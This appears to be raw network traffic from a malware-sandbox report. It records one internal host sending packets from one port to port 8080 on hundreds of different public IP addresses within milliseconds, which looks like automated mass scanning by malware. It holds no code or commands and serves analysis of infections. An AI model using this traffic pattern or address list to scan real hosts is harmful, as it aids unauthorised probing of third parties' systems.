                                                        Feb 14, 2024 09:32:45.802445889 CET407478080192.168.2.1462.172.158.10
                                                        Feb 14, 2024 09:32:45.802444935 CET407478080192.168.2.1495.132.160.3
                                                        Feb 14, 2024 09:32:45.802445889 CET407478080192.168.2.1431.221.222.34
                                                        Feb 14, 2024 09:32:45.802444935 CET407478080192.168.2.1431.125.89.101
                                                        Feb 14, 2024 09:32:45.802445889 CET407478080192.168.2.1431.186.26.104
                                                        Feb 14, 2024 09:32:45.802444935 CET407478080192.168.2.1431.147.66.92
                                                        Feb 14, 2024 09:32:45.802445889 CET407478080192.168.2.1495.239.28.207
                                                        Feb 14, 2024 09:32:45.802445889 CET407478080192.168.2.1462.37.25.92
                                                        Feb 14, 2024 09:32:45.802445889 CET407478080192.168.2.1494.46.3.139
                                                        Feb 14, 2024 09:32:45.802447081 CET407478080192.168.2.1431.102.61.105
                                                        Feb 14, 2024 09:32:45.802491903 CET407478080192.168.2.1462.111.75.120
                                                        Feb 14, 2024 09:32:45.802491903 CET407478080192.168.2.1462.93.53.26
                                                        Feb 14, 2024 09:32:45.802491903 CET407478080192.168.2.1495.220.211.93
                                                        Feb 14, 2024 09:32:45.802491903 CET407478080192.168.2.1495.243.30.127
                                                        Feb 14, 2024 09:32:45.802491903 CET407478080192.168.2.1495.94.68.254
                                                        Feb 14, 2024 09:32:45.802491903 CET407478080192.168.2.1431.197.208.150
                                                        Feb 14, 2024 09:32:45.802491903 CET407478080192.168.2.1494.3.223.97
                                                        Feb 14, 2024 09:32:45.802515984 CET407478080192.168.2.1431.3.152.51
                                                        Feb 14, 2024 09:32:45.802515984 CET407478080192.168.2.1462.66.96.57
                                                        Feb 14, 2024 09:32:45.802524090 CET407478080192.168.2.1431.226.42.123
                                                        Feb 14, 2024 09:32:45.802524090 CET407478080192.168.2.1494.212.41.158
                                                        Feb 14, 2024 09:32:45.802527905 CET407478080192.168.2.1494.88.176.114
                                                        Feb 14, 2024 09:32:45.802527905 CET407478080192.168.2.1485.80.251.151
                                                        Feb 14, 2024 09:32:45.802527905 CET407478080192.168.2.1431.136.90.41
                                                        Feb 14, 2024 09:32:45.802529097 CET407478080192.168.2.1431.212.28.126
                                                        Feb 14, 2024 09:32:45.802529097 CET407478080192.168.2.1485.148.10.125
                                                        Feb 14, 2024 09:32:45.802529097 CET407478080192.168.2.1462.217.202.142
                                                        Feb 14, 2024 09:32:45.802529097 CET407478080192.168.2.1431.114.21.197
                                                        Feb 14, 2024 09:32:45.802529097 CET407478080192.168.2.1494.104.178.173
                                                        Feb 14, 2024 09:32:45.802541971 CET407478080192.168.2.1495.236.54.65
                                                        Feb 14, 2024 09:32:45.802541971 CET407478080192.168.2.1495.174.187.148
                                                        Feb 14, 2024 09:32:45.802541971 CET407478080192.168.2.1462.159.244.224
                                                        Feb 14, 2024 09:32:45.802541971 CET407478080192.168.2.1495.19.70.236
                                                        Feb 14, 2024 09:32:45.802548885 CET407478080192.168.2.1494.133.233.41
                                                        Feb 14, 2024 09:32:45.802548885 CET407478080192.168.2.1495.158.180.2
                                                        Feb 14, 2024 09:32:45.802548885 CET407478080192.168.2.1495.221.231.43
                                                        Feb 14, 2024 09:32:45.802548885 CET407478080192.168.2.1462.22.121.47
                                                        Feb 14, 2024 09:32:45.802548885 CET407478080192.168.2.1495.106.26.171
                                                        Feb 14, 2024 09:32:45.802576065 CET407478080192.168.2.1462.251.190.109
                                                        Feb 14, 2024 09:32:45.802576065 CET407478080192.168.2.1494.30.254.196
                                                        Feb 14, 2024 09:32:45.802576065 CET407478080192.168.2.1485.159.1.46
                                                        Feb 14, 2024 09:32:45.802577019 CET407478080192.168.2.1485.81.173.225
                                                        Feb 14, 2024 09:32:45.802576065 CET407478080192.168.2.1485.134.157.117
                                                        Feb 14, 2024 09:32:45.802577019 CET407478080192.168.2.1495.63.252.163
                                                        Feb 14, 2024 09:32:45.802576065 CET407478080192.168.2.1462.46.34.25
                                                        Feb 14, 2024 09:32:45.802577019 CET407478080192.168.2.1431.53.119.55
                                                        Feb 14, 2024 09:32:45.802577019 CET407478080192.168.2.1495.184.197.10
                                                        Feb 14, 2024 09:32:45.802577019 CET407478080192.168.2.1494.43.100.128
                                                        Feb 14, 2024 09:32:45.802577019 CET407478080192.168.2.1462.168.212.222
                                                        Feb 14, 2024 09:32:45.802577019 CET407478080192.168.2.1494.232.162.146
                                                        Feb 14, 2024 09:32:45.802577019 CET407478080192.168.2.1462.88.115.133
                                                        Feb 14, 2024 09:32:45.802589893 CET407478080192.168.2.1495.74.160.231
                                                        Feb 14, 2024 09:32:45.802589893 CET407478080192.168.2.1494.0.237.55
                                                        Feb 14, 2024 09:32:45.802589893 CET407478080192.168.2.1495.84.118.218
                                                        Feb 14, 2024 09:32:45.802589893 CET407478080192.168.2.1495.157.210.104
                                                        Feb 14, 2024 09:32:45.802589893 CET407478080192.168.2.1462.231.244.144
                                                        Feb 14, 2024 09:32:45.802591085 CET407478080192.168.2.1494.40.142.55
                                                        Feb 14, 2024 09:32:45.802591085 CET407478080192.168.2.1494.81.122.211
                                                        Feb 14, 2024 09:32:45.802591085 CET407478080192.168.2.1495.168.108.154
                                                        Feb 14, 2024 09:32:45.802606106 CET407478080192.168.2.1485.234.112.74
                                                        Feb 14, 2024 09:32:45.802606106 CET407478080192.168.2.1494.83.100.251
                                                        Feb 14, 2024 09:32:45.802608013 CET407478080192.168.2.1495.211.214.167
                                                        Feb 14, 2024 09:32:45.802606106 CET407478080192.168.2.1495.11.164.158
                                                        Feb 14, 2024 09:32:45.802608013 CET407478080192.168.2.1485.74.164.118
                                                        Feb 14, 2024 09:32:45.802608013 CET407478080192.168.2.1485.154.165.46
                                                        Feb 14, 2024 09:32:45.802606106 CET407478080192.168.2.1462.191.11.213
                                                        Feb 14, 2024 09:32:45.802608013 CET407478080192.168.2.1494.247.151.85
                                                        Feb 14, 2024 09:32:45.802606106 CET407478080192.168.2.1495.114.121.141
                                                        Feb 14, 2024 09:32:45.802608013 CET407478080192.168.2.1431.189.133.193
                                                        Feb 14, 2024 09:32:45.802606106 CET407478080192.168.2.1494.1.217.127
                                                        Feb 14, 2024 09:32:45.802608013 CET407478080192.168.2.1431.138.234.123
                                                        Feb 14, 2024 09:32:45.802606106 CET407478080192.168.2.1494.218.96.48
                                                        Feb 14, 2024 09:32:45.802608013 CET407478080192.168.2.1462.195.2.247
                                                        Feb 14, 2024 09:32:45.802606106 CET407478080192.168.2.1485.163.194.240
                                                        Feb 14, 2024 09:32:45.802608013 CET407478080192.168.2.1494.170.103.143
                                                        Feb 14, 2024 09:32:45.802613020 CET407478080192.168.2.1462.73.229.223
                                                        Feb 14, 2024 09:32:45.802613020 CET407478080192.168.2.1431.141.118.55
                                                        Feb 14, 2024 09:32:45.802613020 CET407478080192.168.2.1494.111.179.23
                                                        Feb 14, 2024 09:32:45.802613020 CET407478080192.168.2.1431.47.80.102
                                                        Feb 14, 2024 09:32:45.802627087 CET407478080192.168.2.1462.30.27.154
                                                        Feb 14, 2024 09:32:45.802627087 CET407478080192.168.2.1494.102.61.91
                                                        Feb 14, 2024 09:32:45.802627087 CET407478080192.168.2.1485.242.53.215
                                                        Feb 14, 2024 09:32:45.802627087 CET407478080192.168.2.1485.45.87.64
                                                        Feb 14, 2024 09:32:45.802627087 CET407478080192.168.2.1431.243.32.176
                                                        Feb 14, 2024 09:32:45.802628040 CET407478080192.168.2.1462.137.234.83
                                                        Feb 14, 2024 09:32:45.802628040 CET407478080192.168.2.1462.125.47.142
                                                        Feb 14, 2024 09:32:45.802628040 CET407478080192.168.2.1431.169.15.107
                                                        Feb 14, 2024 09:32:45.802634954 CET407478080192.168.2.1494.252.58.71
                                                        Feb 14, 2024 09:32:45.802634954 CET407478080192.168.2.1485.15.221.64
                                                        Feb 14, 2024 09:32:45.802634954 CET407478080192.168.2.1462.140.112.11
                                                        Feb 14, 2024 09:32:45.802671909 CET407478080192.168.2.1431.80.248.0
                                                        Feb 14, 2024 09:32:45.802671909 CET407478080192.168.2.1494.251.148.54
                                                        Feb 14, 2024 09:32:45.802673101 CET407478080192.168.2.1431.229.191.175
                                                        Feb 14, 2024 09:32:45.802671909 CET407478080192.168.2.1462.11.25.100
                                                        Feb 14, 2024 09:32:45.802673101 CET407478080192.168.2.1431.38.189.50
                                                        Feb 14, 2024 09:32:45.802671909 CET407478080192.168.2.1485.58.180.99
                                                        Feb 14, 2024 09:32:45.802673101 CET407478080192.168.2.1495.108.120.154
                                                        Feb 14, 2024 09:32:45.802671909 CET407478080192.168.2.1494.38.223.79
                                                        Feb 14, 2024 09:32:45.802680016 CET407478080192.168.2.1462.136.17.17
                                                        Feb 14, 2024 09:32:45.802671909 CET407478080192.168.2.1485.144.139.223
                                                        Feb 14, 2024 09:32:45.802671909 CET407478080192.168.2.1494.144.222.136
                                                        Feb 14, 2024 09:32:45.802671909 CET407478080192.168.2.1495.132.55.7
                                                        Feb 14, 2024 09:32:45.802673101 CET407478080192.168.2.1494.162.196.154
                                                        Feb 14, 2024 09:32:45.802671909 CET407478080192.168.2.1462.205.156.123
                                                        Feb 14, 2024 09:32:45.802671909 CET407478080192.168.2.1495.161.194.94
                                                        Feb 14, 2024 09:32:45.802671909 CET407478080192.168.2.1431.185.177.97
                                                        Feb 14, 2024 09:32:45.802673101 CET407478080192.168.2.1431.134.156.21
                                                        Feb 14, 2024 09:32:45.802680016 CET407478080192.168.2.1431.98.76.194
                                                        Feb 14, 2024 09:32:45.802671909 CET407478080192.168.2.1431.11.16.100
                                                        Feb 14, 2024 09:32:45.802680016 CET407478080192.168.2.1495.45.121.56
                                                        Feb 14, 2024 09:32:45.802680016 CET407478080192.168.2.1431.127.27.254
                                                        Feb 14, 2024 09:32:45.802671909 CET407478080192.168.2.1494.120.67.130
                                                        Feb 14, 2024 09:32:45.802671909 CET407478080192.168.2.1431.118.215.185
                                                        Feb 14, 2024 09:32:45.802671909 CET407478080192.168.2.1495.143.117.105
                                                        Feb 14, 2024 09:32:45.802671909 CET407478080192.168.2.1494.147.57.170
                                                        Feb 14, 2024 09:32:45.802695990 CET407478080192.168.2.1495.240.17.221
                                                        Feb 14, 2024 09:32:45.802695990 CET407478080192.168.2.1462.248.32.64
                                                        Feb 14, 2024 09:32:45.802695990 CET407478080192.168.2.1495.96.73.206
                                                        Feb 14, 2024 09:32:45.802695990 CET407478080192.168.2.1485.153.37.44
                                                        Feb 14, 2024 09:32:45.802695990 CET407478080192.168.2.1494.231.5.136
                                                        Feb 14, 2024 09:32:45.802695990 CET407478080192.168.2.1495.121.58.85
                                                        Feb 14, 2024 09:32:45.802695990 CET407478080192.168.2.1495.53.235.167
                                                        Feb 14, 2024 09:32:45.802695990 CET407478080192.168.2.1462.59.64.141
                                                        Feb 14, 2024 09:32:45.802726984 CET407478080192.168.2.1431.167.156.157
                                                        Feb 14, 2024 09:32:45.802727938 CET407478080192.168.2.1495.136.152.47
                                                        Feb 14, 2024 09:32:45.802727938 CET407478080192.168.2.1494.241.191.69
                                                        Feb 14, 2024 09:32:45.802727938 CET407478080192.168.2.1485.43.13.150
                                                        Feb 14, 2024 09:32:45.802727938 CET407478080192.168.2.1495.71.171.132
                                                        Feb 14, 2024 09:32:45.802727938 CET407478080192.168.2.1431.76.240.8
                                                        Feb 14, 2024 09:32:45.802727938 CET407478080192.168.2.1462.211.162.147
                                                        Feb 14, 2024 09:32:45.802736044 CET407478080192.168.2.1495.47.101.117
                                                        Feb 14, 2024 09:32:45.802736044 CET407478080192.168.2.1431.154.234.37
                                                        Feb 14, 2024 09:32:45.802736044 CET407478080192.168.2.1495.58.121.113
                                                        Feb 14, 2024 09:32:45.802736044 CET407478080192.168.2.1462.124.247.50
                                                        Feb 14, 2024 09:32:45.802740097 CET407478080192.168.2.1485.24.63.111
                                                        Feb 14, 2024 09:32:45.802740097 CET407478080192.168.2.1485.201.102.97
                                                        Feb 14, 2024 09:32:45.802740097 CET407478080192.168.2.1431.183.15.114
                                                        Feb 14, 2024 09:32:45.802755117 CET407478080192.168.2.1494.130.157.31
                                                        Feb 14, 2024 09:32:45.802755117 CET407478080192.168.2.1494.163.99.37
                                                        Feb 14, 2024 09:32:45.802755117 CET407478080192.168.2.1485.41.190.129
                                                        Feb 14, 2024 09:32:45.802755117 CET407478080192.168.2.1462.249.45.46
                                                        Feb 14, 2024 09:32:45.802755117 CET407478080192.168.2.1431.223.78.187
                                                        Feb 14, 2024 09:32:45.802755117 CET407478080192.168.2.1494.122.157.112
                                                        Feb 14, 2024 09:32:45.802793026 CET407478080192.168.2.1431.183.76.137
                                                        Feb 14, 2024 09:32:45.802793026 CET407478080192.168.2.1495.191.186.236
                                                        Feb 14, 2024 09:32:45.802793026 CET407478080192.168.2.1431.133.94.134
                                                        Feb 14, 2024 09:32:45.802793026 CET407478080192.168.2.1494.160.251.194
                                                        Feb 14, 2024 09:32:45.802793026 CET407478080192.168.2.1462.41.172.244
                                                        Feb 14, 2024 09:32:45.802793980 CET407478080192.168.2.1462.9.92.62
                                                        Feb 14, 2024 09:32:45.802793980 CET407478080192.168.2.1485.71.93.207
                                                        Feb 14, 2024 09:32:45.802793980 CET407478080192.168.2.1485.220.236.242
                                                        Feb 14, 2024 09:32:45.802795887 CET407478080192.168.2.1431.140.155.207
                                                        Feb 14, 2024 09:32:45.802795887 CET407478080192.168.2.1495.110.151.62
                                                        Feb 14, 2024 09:32:45.802795887 CET407478080192.168.2.1485.196.74.134
                                                        Feb 14, 2024 09:32:45.802795887 CET407478080192.168.2.1462.134.100.195
                                                        Feb 14, 2024 09:32:45.802797079 CET407478080192.168.2.1495.17.20.114
                                                        Feb 14, 2024 09:32:45.802803993 CET407478080192.168.2.1494.149.18.225
                                                        Feb 14, 2024 09:32:45.802803993 CET407478080192.168.2.1495.99.166.152
                                                        Feb 14, 2024 09:32:45.802814007 CET407478080192.168.2.1462.11.255.101
                                                        Feb 14, 2024 09:32:45.802814007 CET407478080192.168.2.1431.166.86.92
                                                        Feb 14, 2024 09:32:45.802814007 CET407478080192.168.2.1462.230.180.61
                                                        Feb 14, 2024 09:32:45.802846909 CET407478080192.168.2.1485.33.26.246
                                                        Feb 14, 2024 09:32:45.802846909 CET407478080192.168.2.1431.148.114.226
                                                        Feb 14, 2024 09:32:45.802855968 CET407478080192.168.2.1494.11.70.238
                                                        Feb 14, 2024 09:32:45.802855968 CET407478080192.168.2.1431.233.241.183
                                                        Feb 14, 2024 09:32:45.802855968 CET407478080192.168.2.1494.154.21.10
                                                        Feb 14, 2024 09:32:45.802855968 CET407478080192.168.2.1462.111.189.40
                                                        Feb 14, 2024 09:32:45.802855968 CET407478080192.168.2.1485.183.116.141
                                                        Feb 14, 2024 09:32:45.802861929 CET407478080192.168.2.1485.130.177.80
                                                        Feb 14, 2024 09:32:45.802861929 CET407478080192.168.2.1495.222.8.188
                                                        Feb 14, 2024 09:32:45.802861929 CET407478080192.168.2.1495.20.136.123
                                                        Feb 14, 2024 09:32:45.802861929 CET407478080192.168.2.1462.244.223.49
                                                        Feb 14, 2024 09:32:45.802861929 CET407478080192.168.2.1462.105.33.97
                                                        Feb 14, 2024 09:32:45.802861929 CET407478080192.168.2.1495.38.111.148
                                                        Feb 14, 2024 09:32:45.802861929 CET407478080192.168.2.1485.225.14.23
                                                        Feb 14, 2024 09:32:45.802861929 CET407478080192.168.2.1462.4.168.143
                                                        Feb 14, 2024 09:32:45.802866936 CET407478080192.168.2.1494.220.134.152
                                                        Feb 14, 2024 09:32:45.802866936 CET407478080192.168.2.1431.130.163.20
                                                        Feb 14, 2024 09:32:45.802867889 CET407478080192.168.2.1462.68.146.235
                                                        Feb 14, 2024 09:32:45.802866936 CET407478080192.168.2.1462.187.132.80
                                                        Feb 14, 2024 09:32:45.802875996 CET407478080192.168.2.1431.80.3.239
                                                        Feb 14, 2024 09:32:45.802882910 CET407478080192.168.2.1462.83.130.28
                                                        Feb 14, 2024 09:32:45.802882910 CET407478080192.168.2.1462.213.15.54
                                                        Feb 14, 2024 09:32:45.802886963 CET407478080192.168.2.1462.76.125.18
                                                        Feb 14, 2024 09:32:45.802886963 CET407478080192.168.2.1494.69.94.165
                                                        Feb 14, 2024 09:32:45.802894115 CET407478080192.168.2.1495.94.113.57
                                                        Feb 14, 2024 09:32:45.802894115 CET407478080192.168.2.1494.228.222.32
                                                        Feb 14, 2024 09:32:45.802894115 CET407478080192.168.2.1485.145.238.255
                                                        Feb 14, 2024 09:32:45.802906990 CET407478080192.168.2.1494.234.221.208
                                                        Feb 14, 2024 09:32:45.802906990 CET407478080192.168.2.1485.181.6.113
                                                        Feb 14, 2024 09:32:45.802913904 CET407478080192.168.2.1431.212.47.146
                                                        Feb 14, 2024 09:32:45.802913904 CET407478080192.168.2.1494.237.189.65
                                                        Feb 14, 2024 09:32:45.802920103 CET407478080192.168.2.1494.27.118.250
                                                        Feb 14, 2024 09:32:45.802920103 CET407478080192.168.2.1431.248.196.223
                                                        Feb 14, 2024 09:32:45.802920103 CET407478080192.168.2.1494.133.37.170
                                                        Feb 14, 2024 09:32:45.802920103 CET407478080192.168.2.1462.140.98.103
                                                        Feb 14, 2024 09:32:45.802920103 CET407478080192.168.2.1494.160.184.155
                                                        Feb 14, 2024 09:32:45.802920103 CET407478080192.168.2.1431.219.235.181
                                                        Feb 14, 2024 09:32:45.802921057 CET407478080192.168.2.1462.219.50.231
                                                        Feb 14, 2024 09:32:45.802921057 CET407478080192.168.2.1431.58.142.155
                                                        Feb 14, 2024 09:32:45.802930117 CET407478080192.168.2.1485.186.135.171
                                                        Feb 14, 2024 09:32:45.802930117 CET407478080192.168.2.1494.63.170.141
                                                        Feb 14, 2024 09:32:45.802941084 CET407478080192.168.2.1431.72.161.251
                                                        Feb 14, 2024 09:32:45.802942038 CET407478080192.168.2.1462.46.60.226
                                                        Feb 14, 2024 09:32:45.802942038 CET407478080192.168.2.1431.114.199.68
                                                        Feb 14, 2024 09:32:45.802942038 CET407478080192.168.2.1485.130.218.159
                                                        Feb 14, 2024 09:32:45.802942038 CET407478080192.168.2.1494.160.200.214
                                                        Feb 14, 2024 09:32:45.802942038 CET407478080192.168.2.1431.164.165.7
                                                        Feb 14, 2024 09:32:45.802942038 CET407478080192.168.2.1495.9.213.107
                                                        Feb 14, 2024 09:32:45.802942038 CET407478080192.168.2.1495.41.186.184
                                                        Feb 14, 2024 09:32:45.802942038 CET407478080192.168.2.1495.194.12.71
                                                        Feb 14, 2024 09:32:45.802948952 CET407478080192.168.2.1462.219.75.107
                                                        Feb 14, 2024 09:32:45.802948952 CET407478080192.168.2.1431.192.17.26
                                                        Feb 14, 2024 09:32:45.802948952 CET407478080192.168.2.1462.12.15.123
                                                        Feb 14, 2024 09:32:45.802948952 CET407478080192.168.2.1431.219.242.48
                                                        Feb 14, 2024 09:32:45.802948952 CET407478080192.168.2.1495.253.88.95
                                                        Feb 14, 2024 09:32:45.802948952 CET407478080192.168.2.1485.175.203.79
                                                        Feb 14, 2024 09:32:45.802954912 CET407478080192.168.2.1495.116.131.181
                                                        Feb 14, 2024 09:32:45.802948952 CET407478080192.168.2.1462.190.236.122
                                                        Feb 14, 2024 09:32:45.802948952 CET407478080192.168.2.1485.74.131.11
                                                        Feb 14, 2024 09:32:45.802958012 CET407478080192.168.2.1495.15.152.65
                                                        Feb 14, 2024 09:32:45.802958012 CET407478080192.168.2.1431.147.51.177
                                                        Feb 14, 2024 09:32:45.802967072 CET407478080192.168.2.1495.163.99.45
                                                        Feb 14, 2024 09:32:45.802968979 CET407478080192.168.2.1494.177.27.34
                                                        Feb 14, 2024 09:32:45.802968979 CET407478080192.168.2.1485.180.86.207
                                                        Feb 14, 2024 09:32:45.802968979 CET407478080192.168.2.1494.78.152.34
                                                        Feb 14, 2024 09:32:45.802968979 CET407478080192.168.2.1494.84.228.179
                                                        Feb 14, 2024 09:32:45.802969933 CET407478080192.168.2.1462.232.142.133
                                                        Feb 14, 2024 09:32:45.802969933 CET407478080192.168.2.1495.187.83.255
                                                        Feb 14, 2024 09:32:45.802969933 CET407478080192.168.2.1462.39.199.185
                                                        Feb 14, 2024 09:32:45.802969933 CET407478080192.168.2.1462.146.166.252
                                                        Feb 14, 2024 09:32:45.802992105 CET407478080192.168.2.1462.201.62.221
                                                        Feb 14, 2024 09:32:45.802992105 CET407478080192.168.2.1431.224.91.145
                                                        Feb 14, 2024 09:32:45.802992105 CET407478080192.168.2.1431.129.230.118
                                                        Feb 14, 2024 09:32:45.802994013 CET407478080192.168.2.1431.187.145.62
                                                        Feb 14, 2024 09:32:45.802998066 CET407478080192.168.2.1462.246.245.212
                                                        Feb 14, 2024 09:32:45.802998066 CET407478080192.168.2.1494.184.119.251
                                                        Feb 14, 2024 09:32:45.802998066 CET407478080192.168.2.1495.168.179.47
                                                        Feb 14, 2024 09:32:45.802998066 CET407478080192.168.2.1485.203.38.86
                                                        Feb 14, 2024 09:32:45.802998066 CET407478080192.168.2.1495.250.251.12
                                                        Feb 14, 2024 09:32:45.802998066 CET407478080192.168.2.1494.25.109.103
                                                        Feb 14, 2024 09:32:45.802998066 CET407478080192.168.2.1494.86.31.81
                                                        Feb 14, 2024 09:32:45.802998066 CET407478080192.168.2.1494.15.91.19
                                                        Feb 14, 2024 09:32:45.803000927 CET407478080192.168.2.1494.115.112.227
                                                        Feb 14, 2024 09:32:45.803000927 CET407478080192.168.2.1462.20.18.180
                                                        Feb 14, 2024 09:32:45.803000927 CET407478080192.168.2.1485.113.198.216
                                                        Feb 14, 2024 09:32:45.803004980 CET407478080192.168.2.1494.75.212.214
                                                        Feb 14, 2024 09:32:45.803010941 CET407478080192.168.2.1495.43.240.197
                                                        Feb 14, 2024 09:32:45.803010941 CET407478080192.168.2.1494.120.219.113
                                                        Feb 14, 2024 09:32:45.803010941 CET407478080192.168.2.1495.176.199.61
                                                        Feb 14, 2024 09:32:45.803010941 CET407478080192.168.2.1495.171.188.214
                                                        Feb 14, 2024 09:32:45.803010941 CET407478080192.168.2.1485.63.137.230
                                                        Feb 14, 2024 09:32:45.803010941 CET407478080192.168.2.1495.229.85.87
                                                        Feb 14, 2024 09:32:45.803010941 CET407478080192.168.2.1495.239.75.5
                                                        Feb 14, 2024 09:32:45.803050995 CET407478080192.168.2.1485.111.17.247
                                                        Feb 14, 2024 09:32:45.803051949 CET407478080192.168.2.1485.236.104.213
                                                        Feb 14, 2024 09:32:45.803052902 CET407478080192.168.2.1494.237.125.170
                                                        Feb 14, 2024 09:32:45.803052902 CET407478080192.168.2.1462.169.31.80
                                                        Feb 14, 2024 09:32:45.803052902 CET407478080192.168.2.1494.72.158.86
                                                        Feb 14, 2024 09:32:45.803052902 CET407478080192.168.2.1431.55.35.32
                                                        Feb 14, 2024 09:32:45.803056955 CET407478080192.168.2.1462.28.142.163
                                                        Feb 14, 2024 09:32:45.803056955 CET407478080192.168.2.1494.49.20.230
                                                        Feb 14, 2024 09:32:45.803056955 CET407478080192.168.2.1495.5.114.180
                                                        Feb 14, 2024 09:32:45.803056955 CET407478080192.168.2.1431.54.234.151
                                                        Feb 14, 2024 09:32:45.803056955 CET407478080192.168.2.1431.144.69.109
                                                        Feb 14, 2024 09:32:45.803056955 CET407478080192.168.2.1494.28.136.130
                                                        Feb 14, 2024 09:32:45.803056955 CET407478080192.168.2.1462.90.124.0
                                                        Feb 14, 2024 09:32:45.803056955 CET407478080192.168.2.1431.153.8.178
                                                        Feb 14, 2024 09:32:45.803080082 CET407478080192.168.2.1494.23.26.227
                                                        Feb 14, 2024 09:32:45.803080082 CET407478080192.168.2.1494.135.176.192
                                                        Feb 14, 2024 09:32:45.803080082 CET407478080192.168.2.1431.18.175.29
                                                        Feb 14, 2024 09:32:45.803080082 CET407478080192.168.2.1431.40.42.66
                                                        Feb 14, 2024 09:32:45.803087950 CET407478080192.168.2.1485.246.241.67
                                                        Feb 14, 2024 09:32:45.803088903 CET407478080192.168.2.1431.32.49.51
                                                        Feb 14, 2024 09:32:45.803088903 CET407478080192.168.2.1462.183.255.157
                                                        Feb 14, 2024 09:32:45.803088903 CET407478080192.168.2.1431.216.63.199
                                                        Feb 14, 2024 09:32:45.803088903 CET407478080192.168.2.1485.58.226.123
                                                        Feb 14, 2024 09:32:45.803087950 CET407478080192.168.2.1485.254.83.63
                                                        Feb 14, 2024 09:32:45.803093910 CET407478080192.168.2.1485.85.244.166
                                                        Feb 14, 2024 09:32:45.803087950 CET407478080192.168.2.1485.231.83.206
                                                        Feb 14, 2024 09:32:45.803093910 CET407478080192.168.2.1462.196.47.173
                                                        Feb 14, 2024 09:32:45.803096056 CET407478080192.168.2.1494.51.196.71
                                                        Feb 14, 2024 09:32:45.803093910 CET407478080192.168.2.1462.149.173.158
                                                        Feb 14, 2024 09:32:45.803087950 CET407478080192.168.2.1462.139.181.221
                                                        Feb 14, 2024 09:32:45.803093910 CET407478080192.168.2.1495.128.36.97
                                                        Feb 14, 2024 09:32:45.803087950 CET407478080192.168.2.1431.32.96.183
                                                        Feb 14, 2024 09:32:45.803096056 CET407478080192.168.2.1494.55.211.129
                                                        Feb 14, 2024 09:32:45.803093910 CET407478080192.168.2.1495.236.203.223
                                                        Feb 14, 2024 09:32:45.803096056 CET407478080192.168.2.1431.25.221.64
                                                        Feb 14, 2024 09:32:45.803093910 CET407478080192.168.2.1495.41.198.205
                                                        Feb 14, 2024 09:32:45.803093910 CET407478080192.168.2.1495.145.123.35
                                                        Feb 14, 2024 09:32:45.803109884 CET407478080192.168.2.1485.188.163.159
                                                        Feb 14, 2024 09:32:45.803109884 CET407478080192.168.2.1485.198.134.63
                                                        Feb 14, 2024 09:32:45.803109884 CET407478080192.168.2.1462.120.146.95
                                                        Feb 14, 2024 09:32:45.803109884 CET407478080192.168.2.1495.43.222.191
                                                        Feb 14, 2024 09:32:45.803111076 CET407478080192.168.2.1462.201.215.189
                                                        Feb 14, 2024 09:32:45.803111076 CET407478080192.168.2.1485.181.218.209
                                                        Feb 14, 2024 09:32:45.803111076 CET407478080192.168.2.1431.26.111.178
                                                        Feb 14, 2024 09:32:45.803111076 CET407478080192.168.2.1462.109.149.214
                                                        Feb 14, 2024 09:32:45.803136110 CET407478080192.168.2.1462.96.127.140
                                                        Feb 14, 2024 09:32:45.803136110 CET407478080192.168.2.1462.255.191.7
                                                        Feb 14, 2024 09:32:45.803136110 CET407478080192.168.2.1495.76.234.108
                                                        Feb 14, 2024 09:32:45.803136110 CET407478080192.168.2.1431.187.171.251
                                                        Feb 14, 2024 09:32:45.803136110 CET407478080192.168.2.1495.227.165.62
                                                        Feb 14, 2024 09:32:45.803136110 CET407478080192.168.2.1485.11.218.217
                                                        Feb 14, 2024 09:32:45.803164959 CET407478080192.168.2.1485.11.204.16
                                                        Feb 14, 2024 09:32:45.803164959 CET407478080192.168.2.1431.24.133.186
                                                        Feb 14, 2024 09:32:45.803164959 CET407478080192.168.2.1494.187.11.210
                                                        Feb 14, 2024 09:32:45.803169012 CET407478080192.168.2.1462.5.30.243
                                                        Feb 14, 2024 09:32:45.803164959 CET407478080192.168.2.1462.27.3.17
                                                        Feb 14, 2024 09:32:45.803169012 CET407478080192.168.2.1485.47.66.48
                                                        Feb 14, 2024 09:32:45.803164959 CET407478080192.168.2.1431.32.244.199
                                                        Feb 14, 2024 09:32:45.803169012 CET407478080192.168.2.1462.218.255.217
                                                        Feb 14, 2024 09:32:45.803169012 CET407478080192.168.2.1485.87.67.182
                                                        Feb 14, 2024 09:32:45.803164959 CET407478080192.168.2.1494.122.72.40
                                                        Feb 14, 2024 09:32:45.803169012 CET407478080192.168.2.1495.62.21.72
                                                        Feb 14, 2024 09:32:45.803169012 CET407478080192.168.2.1485.230.155.52
                                                        Feb 14, 2024 09:32:45.803164959 CET407478080192.168.2.1485.177.56.79
                                                        Feb 14, 2024 09:32:45.803169012 CET407478080192.168.2.1431.95.233.14
                                                        Feb 14, 2024 09:32:45.803164959 CET407478080192.168.2.1494.104.92.119
                                                        Feb 14, 2024 09:32:45.803169012 CET407478080192.168.2.1495.169.213.31
                                                        Feb 14, 2024 09:32:45.803184986 CET407478080192.168.2.1494.198.236.81
                                                        Feb 14, 2024 09:32:45.803196907 CET407478080192.168.2.1494.48.220.180
                                                        Feb 14, 2024 09:32:45.803196907 CET407478080192.168.2.1494.130.213.220
                                                        Feb 14, 2024 09:32:45.803205967 CET407478080192.168.2.1495.15.224.83
                                                        Feb 14, 2024 09:32:45.803208113 CET407478080192.168.2.1495.189.143.167
                                                        Feb 14, 2024 09:32:45.803208113 CET407478080192.168.2.1494.138.147.151
                                                        Feb 14, 2024 09:32:45.803208113 CET407478080192.168.2.1494.8.42.181
                                                        Feb 14, 2024 09:32:45.803208113 CET407478080192.168.2.1462.178.230.91
                                                        Feb 14, 2024 09:32:45.803208113 CET407478080192.168.2.1485.49.184.133
                                                        Feb 14, 2024 09:32:45.803208113 CET407478080192.168.2.1431.216.87.151
                                                        Feb 14, 2024 09:32:45.803208113 CET407478080192.168.2.1462.10.118.200
                                                        Feb 14, 2024 09:32:45.803208113 CET407478080192.168.2.1495.29.102.146
                                                        Feb 14, 2024 09:32:45.803210974 CET407478080192.168.2.1431.25.67.186
                                                        Feb 14, 2024 09:32:45.803210974 CET407478080192.168.2.1431.79.86.91
                                                        Feb 14, 2024 09:32:45.803210974 CET407478080192.168.2.1494.210.74.123
                                                        Feb 14, 2024 09:32:45.803210974 CET407478080192.168.2.1431.183.37.1
                                                        Feb 14, 2024 09:32:45.803210974 CET407478080192.168.2.1431.10.2.116
                                                        Feb 14, 2024 09:32:45.803210974 CET407478080192.168.2.1431.182.8.198
                                                        Feb 14, 2024 09:32:45.803211927 CET407478080192.168.2.1431.188.99.171
